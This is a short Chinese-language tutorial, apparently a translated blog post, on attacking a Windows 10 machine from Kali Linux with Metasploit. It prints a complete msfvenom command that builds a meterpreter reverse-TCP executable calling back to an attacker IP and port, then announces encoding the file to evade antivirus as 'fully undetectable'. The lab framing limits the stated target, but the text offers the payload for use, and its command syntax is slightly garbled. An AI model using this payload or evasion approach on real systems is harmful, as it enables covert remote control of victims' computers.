Metasploit框架是全球黑客最常用的框架。它允許黑客設置創建有利環境（稱為Meterpreter）的偵聽器來操縱受感染的計算機。在本文中，我們將了解Kali Linux中的這個框架如何用于攻擊Windows10計算機。我們將使用Shellter通過惡意可執行文件執行此操作。

本文假設已經完成了Kali Linux的安裝，并且可以通過VirtualBox上的Windows機器的橋接連接來訪問。

創建惡意.exe文件

要創建可執行文件，您可以使用msfvenom，如下面的命令所示：

msfvenom -p windows / meterpreter / reverse_tcp -a x86 -platform windows -f exe LHOST = 192.168.100.4 LPORT = 4444 -o /root/something32.exe

上面的命令指示msfvenom生成一個32位Windows可執行文件，該文件為有效負載實現反向TCP連接。必須將格式指定為類型.exe，并且必須定義本地主機（LHOST）和本地端口（LPORT）。在我們的例子中，LHOST是我們攻擊的Kali Linux機器的IP地址，LPORT是在目標受到攻擊后監聽來自目標的連接的端口。

要獲取我們的IP地址，我們在Kali中使用ifconfig命令，將接口指定為eth0（因為我們在以太網上），如下所示。

下面的屏幕截圖顯示了成功.exe生成時命令的輸出。

防病毒解決方案通過檢測可執行文件中的惡意簽名來工作。 因此，我們的文件將在Windows環境中被標記為惡意文件。 因此，我們必須找到一種方法來修改它以繞過防病毒檢測。 我們將對其進行編碼以使其完全不可檢測，或FUD。